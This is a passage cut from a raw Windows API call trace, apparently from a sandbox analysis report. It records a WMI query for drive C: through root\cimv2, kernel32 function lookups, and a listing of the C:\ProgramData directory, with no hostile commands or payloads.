This=0x6738bd0, puCount=0x6ceeb80 | out: puCount=0x6ceeb80*=0x2) returned 0x0 [0211.757] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x6ceeb7c*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb7c*=0xf, pszText=0x0) returned 0x0 [0211.757] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x6ceeb7c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb7c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.757] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb80 | out: ppv=0x6ceeb80*=0x72015c) returned 0x0 [0211.757] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb78 | out: pAptType=0x6ceeb78*=1) returned 0x0 [0211.757] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb7c | out: ppvObject=0x6ceeb7c*=0x0) returned 0x80004002 [0211.757] IUnknown:Release (This=0x72015c) returned 0x1 [0211.758] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee7a0 | out: ppv=0x6cee7a0*=0x672f280) returned 0x0 [0211.758] WbemLocator:IUnknown:QueryInterface (in: This=0x672f280, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee9b8 | out: ppvObject=0x6cee9b8*=0x0) returned 0x80004002 [0211.758] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f280, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9cc | out: ppvObject=0x6cee9cc*=0x6736dd8) returned 0x0 [0211.758] WbemLocator:IUnknown:Release (This=0x672f280) returned 0x0 [0211.758] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dd8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee5ec | out: ppvObject=0x6cee5ec*=0x6736dd8) returned 0x0 [0211.758] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dd8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee5a8 | out: ppvObject=0x6cee5a8*=0x0) returned 0x80004002 [0211.758] WbemLocator:IUnknown:AddRef (This=0x6736dd8) returned 0x3 [0211.758] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dd8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedf04 | out: ppvObject=0x6cedf04*=0x0) returned 0x80004002 [0211.758] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dd8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedeb4 | out: ppvObject=0x6cedeb4*=0x0) returned 0x80004002 [0211.758] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dd8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedec0 | out: ppvObject=0x6cedec0*=0x0) returned 0x80004002 [0211.758] CoGetContextToken (in: pToken=0x6cedf20 | out: pToken=0x6cedf20) returned 0x0 [0211.758] CoGetContextToken (in: pToken=0x6cee328 | out: pToken=0x6cee328) returned 0x0 [0211.758] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dd8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3b8 | out: ppvObject=0x6cee3b8*=0x0) returned 0x80004002 [0211.758] WbemLocator:IUnknown:Release (This=0x6736dd8) returned 0x2 [0211.758] WbemLocator:IUnknown:Release (This=0x6736dd8) returned 0x1 [0211.758] CoGetContextToken (in: pToken=0x6cee998 | out: pToken=0x6cee998) returned 0x0 [0211.758] CoGetContextToken (in: pToken=0x6cee8f8 | out: pToken=0x6cee8f8) returned 0x0 [0211.758] WbemLocator:IUnknown:QueryInterface (in: This=0x6736dd8, riid=0x6cee9c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6cee9c4 | out: ppvObject=0x6cee9c4*=0x6736dd8) returned 0x0 [0211.759] WbemLocator:IUnknown:AddRef (This=0x6736dd8) returned 0x3 [0211.759] WbemLocator:IUnknown:Release (This=0x6736dd8) returned 0x2 [0211.759] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x6ceeb5c | out: puCount=0x6ceeb5c*=0x2) returned 0x0 [0211.759] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=8, puBuffLength=0x6ceeb58*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb58*=0xf, pszText=0x0) returned 0x0 [0211.759] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=8, puBuffLength=0x6ceeb58*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb58*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.759] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ceea34 | out: ppv=0x6ceea34*=0x6736fc8) returned 0x0 [0211.759] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736fc8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ceeac8 | out: ppNamespace=0x6ceeac8*=0x674820c) returned 0x0 [0216.717] WbemLocator:IUnknown:QueryInterface (in: This=0x674820c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee964 | out: ppvObject=0x6cee964*=0x781364) returned 0x0 [0216.718] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781364, pProxy=0x674820c, pAuthnSvc=0x6cee9b4, pAuthzSvc=0x6cee9b0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac, pImpLevel=0x6cee99c, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4 | out: pAuthnSvc=0x6cee9b4*=0xa, pAuthzSvc=0x6cee9b0*=0x0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac*=0x6, pImpLevel=0x6cee99c*=0x2, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4*=0x1) returned 0x0 [0216.718] WbemLocator:IUnknown:Release (This=0x781364) returned 0x1 [0216.718] WbemLocator:IUnknown:QueryInterface (in: This=0x674820c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee958 | out: ppvObject=0x6cee958*=0x781384) returned 0x0 [0216.718] WbemLocator:IUnknown:QueryInterface (in: This=0x674820c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee954 | out: ppvObject=0x6cee954*=0x781364) returned 0x0 [0216.718] WbemLocator:IClientSecurity:SetBlanket (This=0x781364, pProxy=0x674820c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.718] WbemLocator:IUnknown:Release (This=0x781364) returned 0x2 [0216.718] WbemLocator:IUnknown:Release (This=0x781384) returned 0x1 [0216.718] CoTaskMemFree (pv=0x77df98) [0216.718] WbemLocator:IUnknown:Release (This=0x6736fc8) returned 0x0 [0216.718] WbemLocator:IUnknown:QueryInterface (in: This=0x674820c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee554 | out: ppvObject=0x6cee554*=0x781384) returned 0x0 [0216.718] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee510 | out: ppvObject=0x6cee510*=0x0) returned 0x80004002 [0216.725] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee32c | out: ppvObject=0x6cee32c*=0x0) returned 0x80004002 [0216.727] WbemLocator:IUnknown:AddRef (This=0x781384) returned 0x3 [0216.727] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cede6c | out: ppvObject=0x6cede6c*=0x0) returned 0x80004002 [0216.729] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cede1c | out: ppvObject=0x6cede1c*=0x0) returned 0x80004002 [0216.731] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cede28 | out: ppvObject=0x6cede28*=0x7812e4) returned 0x0 [0216.731] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7812e4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cede30 | out: pCid=0x6cede30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0216.731] WbemLocator:IUnknown:Release (This=0x7812e4) returned 0x3 [0216.731] CoGetContextToken (in: pToken=0x6cede88 | out: pToken=0x6cede88) returned 0x0 [0216.731] CoGetContextToken (in: pToken=0x6cee290 | out: pToken=0x6cee290) returned 0x0 [0216.731] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee320 | out: ppvObject=0x6cee320*=0x78136c) returned 0x0 [0216.731] WbemLocator:IRpcOptions:Query (in: This=0x78136c, pPrx=0x781384, dwProperty=2, pdwValue=0x6cee348 | out: pdwValue=0x6cee348) returned 0x80004002 [0216.731] WbemLocator:IUnknown:Release (This=0x78136c) returned 0x3 [0216.731] WbemLocator:IUnknown:Release (This=0x781384) returned 0x2 [0216.731] CoGetContextToken (in: pToken=0x6cee868 | out: pToken=0x6cee868) returned 0x0 [0216.731] CoGetContextToken (in: pToken=0x6cee7c8 | out: pToken=0x6cee7c8) returned 0x0 [0216.731] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x6cee898*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6cee894 | out: ppvObject=0x6cee894*=0x674820c) returned 0x0 [0216.731] WbemLocator:IUnknown:AddRef (This=0x674820c) returned 0x4 [0216.731] WbemLocator:IUnknown:Release (This=0x674820c) returned 0x3 [0216.731] WbemLocator:IUnknown:Release (This=0x674820c) returned 0x2 [0216.731] SysStringLen (param_1=0x0) returned 0x0 [0216.732] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x6ceec2c | out: puCount=0x6ceec2c*=0x0) returned 0x0 [0216.732] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x6ceec28*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec28*=0x20, pszText=0x0) returned 0x0 [0216.732] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x6ceec28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0216.732] CoGetContextToken (in: pToken=0x6cee898 | out: pToken=0x6cee898) returned 0x0 [0216.732] WbemLocator:IUnknown:AddRef (This=0x781384) returned 0x3 [0216.732] WbemLocator:IUnknown:QueryInterface (in: This=0x781384, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee72c | out: ppvObject=0x6cee72c*=0x781384) returned 0x0 [0216.732] WbemLocator:IUnknown:Release (This=0x781384) returned 0x3 [0216.732] WbemLocator:IUnknown:Release (This=0x781384) returned 0x2 [0216.732] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x6ceec30*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec30*=0x20, pszText=0x0) returned 0x0 [0216.732] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x6ceec30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0216.732] IWbemServices:GetObject (This=0x674820c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6ceebe4*=0x0, ppCallResult=0x0) Thread: id = 136 os_tid = 0x224 [0134.081] SysReAllocStringLen (in: pbstr=0x6e4f74c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6e4f74c*="KERNEL32.DLL") returned 1 [0134.081] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0134.082] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0134.084] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0134.085] SysReAllocStringLen (in: pbstr=0x6e4f74c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6e4f74c*="KERNEL32.DLL") returned 1 [0134.085] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0134.085] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0134.087] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0134.088] SysReAllocStringLen (in: pbstr=0x6e4f728*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6e4f728*="KERNEL32.DLL") returned 1 [0134.088] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0134.088] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0134.090] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0134.093] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0134.094] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0134.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4f0fc) returned 1 [0134.095] GetFullPathNameW (in: lpFileName="C:\\ProgramData", nBufferLength=0x105, lpBuffer=0x6e4ec04, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData", lpFilePart=0x0) returned 0xe [0134.095] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\", nBufferLength=0x105, lpBuffer=0x6e4ebd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\", lpFilePart=0x0) returned 0xf [0134.095] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*", lpFindFileData=0x6e4ee24 | out: lpFindFileData=0x6e4ee24*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77abf0 [0134.095] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.095] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0134.095] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0134.095] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0134.096] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0134.096] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0134.096] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0134.096] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0134.096] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0134.096] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0134.097] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0134.097] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0134.097] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0134.097] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0134.097] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0 [0134.097] FindClose (in: 